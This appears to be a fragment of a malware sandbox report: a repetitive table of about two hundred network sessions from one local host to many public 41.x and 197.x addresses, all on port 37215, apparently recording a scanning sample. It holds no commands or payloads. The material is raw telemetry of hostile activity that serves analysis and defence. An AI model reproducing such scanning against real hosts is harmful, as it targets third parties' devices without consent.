                                                                            13332192.168.2.155783441.65.223.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13333192.168.2.155014441.249.126.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13334192.168.2.155649241.215.32.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13335192.168.2.155537041.97.135.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13336192.168.2.155931441.183.228.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13337192.168.2.154271841.12.40.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13338192.168.2.154419041.36.72.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13339192.168.2.154080441.6.64.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13340192.168.2.155772041.178.63.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13341192.168.2.156071441.28.64.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13342192.168.2.154953241.165.158.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13343192.168.2.155906241.157.150.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13344192.168.2.154566441.58.40.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13345192.168.2.155639641.27.206.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13346192.168.2.155516241.217.163.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13347192.168.2.154290641.218.76.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13348192.168.2.154157241.244.17.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13349192.168.2.153751641.57.32.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13350192.168.2.154374841.242.207.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13351192.168.2.155775641.21.200.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13352192.168.2.154802041.42.219.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13353192.168.2.155965841.127.6.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13354192.168.2.155000841.241.59.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13355192.168.2.153497041.220.92.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13356192.168.2.154085641.2.73.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13357192.168.2.155745041.122.177.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13358192.168.2.154749441.158.220.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13359192.168.2.156029041.84.223.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13360192.168.2.155936441.200.140.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13361192.168.2.155126241.124.220.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13362192.168.2.153562641.151.129.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13363192.168.2.155606041.210.166.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13364192.168.2.155216841.92.184.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13365192.168.2.154936041.253.225.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13366192.168.2.155878841.178.68.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13367192.168.2.155717641.134.136.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13368192.168.2.156049041.111.38.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13369192.168.2.154261441.164.238.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13370192.168.2.154731641.96.227.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13371192.168.2.153426241.61.63.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13372192.168.2.155423441.94.48.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13373192.168.2.154716441.51.121.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13374192.168.2.155050441.64.187.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13375192.168.2.153683041.169.120.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13376192.168.2.153373641.205.207.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13377192.168.2.153749841.107.54.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13378192.168.2.154823441.27.220.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13379192.168.2.153455641.61.238.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13380192.168.2.153877041.118.95.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13381192.168.2.154181041.25.202.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13382192.168.2.154655041.237.43.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13383192.168.2.153590441.188.63.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13384192.168.2.154965641.38.111.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13385192.168.2.155221441.119.37.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13386192.168.2.155407241.165.155.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13387192.168.2.155815041.63.129.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13388192.168.2.154445241.198.142.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13389192.168.2.155927041.90.20.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13390192.168.2.154466441.168.216.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13391192.168.2.155080241.0.147.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13392192.168.2.153674641.39.152.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13393192.168.2.155368241.91.198.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13394192.168.2.154947441.48.224.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13395192.168.2.153719441.213.7.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13396192.168.2.154763641.80.186.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13397192.168.2.156091041.81.176.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13398192.168.2.153390841.135.199.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13399192.168.2.155690041.24.183.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13400192.168.2.155943441.231.155.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13401192.168.2.153770441.135.197.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13402192.168.2.155694241.154.79.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13403192.168.2.156053641.5.180.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13404192.168.2.156034841.9.63.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13405192.168.2.153824241.248.33.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13406192.168.2.154312241.171.245.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13407192.168.2.154450241.77.181.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13408192.168.2.154405841.65.18.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13409192.168.2.153469441.241.85.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13410192.168.2.154444641.60.241.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13411192.168.2.155081041.81.198.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13412192.168.2.154182241.133.205.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13413192.168.2.153462441.17.111.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13414192.168.2.155958441.88.73.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13415192.168.2.156029041.178.102.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13416192.168.2.154189241.120.73.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13417192.168.2.153639441.231.35.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13418192.168.2.155883641.165.164.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13419192.168.2.153721041.216.221.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13420192.168.2.155538841.77.15.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13421192.168.2.156099441.98.213.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13422192.168.2.154104841.126.107.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13423192.168.2.156072841.91.222.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13424192.168.2.155376441.161.211.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13425192.168.2.154011041.83.20.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13426192.168.2.154426241.77.75.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13427192.168.2.155186641.192.233.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13428192.168.2.154958441.198.37.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13429192.168.2.155033641.28.229.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13430192.168.2.154758441.196.230.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13431192.168.2.153999641.232.255.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13432192.168.2.153527841.9.116.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13433192.168.2.153609241.235.168.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13434192.168.2.153987441.48.255.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13435192.168.2.155668641.229.198.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13436192.168.2.155875641.236.208.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13437192.168.2.155458041.67.47.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13438192.168.2.153527041.157.25.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13439192.168.2.154712241.69.86.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13440192.168.2.154520241.210.16.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13441192.168.2.153871441.137.130.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13442192.168.2.154135041.230.15.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13443192.168.2.154326241.132.20.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13444192.168.2.153505441.140.151.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13445192.168.2.155315841.2.32.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13446192.168.2.154448241.238.192.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13447192.168.2.153546841.192.218.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13448192.168.2.155322241.89.121.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13449192.168.2.153428441.140.40.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13450192.168.2.155126441.223.33.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13451192.168.2.154819441.235.227.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13452192.168.2.154353241.249.121.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13453192.168.2.155760441.13.134.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13454192.168.2.154325841.39.134.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13455192.168.2.154457241.240.215.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13456192.168.2.156055641.162.165.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13457192.168.2.155916641.140.31.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13458192.168.2.155121241.204.239.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13459192.168.2.153725441.206.111.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13460192.168.2.155586241.68.24.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13461192.168.2.154254641.132.150.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13462192.168.2.153486641.7.179.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13463192.168.2.155377441.0.90.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13464192.168.2.155791041.38.196.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13465192.168.2.153518441.15.7.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13466192.168.2.153851241.35.124.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13467192.168.2.154687041.0.68.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13468192.168.2.154811641.149.153.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13469192.168.2.153693641.203.160.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13470192.168.2.154306841.48.131.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13471192.168.2.154358241.9.240.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13472192.168.2.154004841.164.208.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13473192.168.2.155661441.175.209.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13474192.168.2.153636841.120.21.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13475192.168.2.153763241.124.97.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13476192.168.2.155985441.160.10.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13477192.168.2.154570641.191.220.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13478192.168.2.156024641.239.127.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13479192.168.2.155223041.140.178.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13480192.168.2.155638041.73.146.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13481192.168.2.155313241.144.191.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13482192.168.2.154988641.69.19.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13483192.168.2.153857241.95.118.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13484192.168.2.155818241.77.238.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13485192.168.2.153647241.74.225.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13486192.168.2.153986841.15.158.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13487192.168.2.154878241.8.91.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13488192.168.2.156042441.73.233.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13489192.168.2.155348441.171.78.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13490192.168.2.155633841.173.194.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13491192.168.2.154930441.168.216.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13492192.168.2.155311841.183.109.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13493192.168.2.154821841.212.171.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13494192.168.2.155538441.176.24.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13495192.168.2.154738441.212.183.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13496192.168.2.154731241.7.48.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13497192.168.2.155122841.91.215.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13498192.168.2.1560056197.106.220.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13499192.168.2.1536336197.152.59.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13500192.168.2.1534350197.105.254.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13501192.168.2.1552522197.110.68.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13502192.168.2.1552160197.16.248.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13503192.168.2.1535654197.200.220.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13504192.168.2.1536576197.36.199.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13505192.168.2.1556574197.100.76.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13506192.168.2.1547976197.102.57.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13507192.168.2.1540020197.107.178.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13508192.168.2.1537296197.194.236.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13509192.168.2.1540602197.50.15.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13510192.168.2.1543974197.130.27.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13511192.168.2.1538070197.195.39.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13512192.168.2.1555054197.250.231.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13513192.168.2.1556326197.194.164.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13514192.168.2.1555172197.143.73.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13515192.168.2.1544080197.127.230.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13516192.168.2.1555380197.147.43.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13517192.168.2.1536270197.219.48.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13518192.168.2.1559172197.75.16.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13519192.168.2.1548490197.226.248.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13520192.168.2.1547764197.167.51.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13521192.168.2.1559916197.101.67.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13522192.168.2.1536348197.101.176.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13523192.168.2.1536586197.67.36.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13524192.168.2.1553890197.112.76.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13525192.168.2.1558270197.202.20.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13526192.168.2.1550688197.112.157.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13527192.168.2.1544206197.112.31.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13528192.168.2.1549106197.113.52.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13529192.168.2.1543620197.76.101.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13530192.168.2.1534516197.4.25.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13531192.168.2.1553086197.95.95.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13532192.168.2.1543002197.6.40.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13533192.168.2.1551216197.172.138.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
